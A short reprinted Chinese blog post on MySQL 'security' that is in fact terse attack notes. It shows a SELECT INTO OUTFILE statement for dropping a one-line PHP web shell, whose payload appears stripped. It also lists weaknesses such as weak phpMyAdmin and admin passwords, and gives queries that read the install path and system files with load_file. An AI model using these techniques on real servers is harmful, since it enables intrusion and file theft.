博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
mysql 安全
阅读量:5881 次
发布时间:2019-06-19

本文共 263 字,大约阅读时间需要 1 分钟。

select '
' into outfile 'D:/APMServ5.2.6/www/htdocs/report/log.php' //一句话

 

危险动作:

1、可直接上传php文件

2、phpmyadmin没有删除或弱口令

3、可在线编辑文件功能

4、爆目录

5、后台弱口令

6、后台可执行sql命令

 

 

select @@basedir as basePath from dual               //数据库安装路径

select load_file('C:/Windows/win.ini')        //查看指定路径下的文件

 

 

 

转载地址:http://cepix.baihongyu.com/

你可能感兴趣的文章
windows下python的自动截图功能
查看>>
单链表常见面试题
查看>>
Oracle 删除重复数据只留一条
查看>>
支持IPV6的瑞士×××之nc命令------强大的网络命令工具
查看>>
keepalived 理论
查看>>
position
查看>>
oracle kill所有plsql developer进程
查看>>
学习Python需要具备什么基础?
查看>>
类的实例化
查看>>
Python学习笔记__12.9章 urlib
查看>>
Ansible自动化运维亲身经验之谈
查看>>
python 高阶函数:map、reduce
查看>>
css图片整合
查看>>
使用阿里云ACM简化你的Spring Cloud微服务环境配置管理
查看>>
修改默认view
查看>>
去中心化、中介化的区块链技术
查看>>
对话DeepMind创始人:建立通用人工智能
查看>>
linux中awk工具的使用
查看>>
我在51CTO微职位学软考——我是mata宇我为自己代言
查看>>
POJ 1852 Ants
查看>>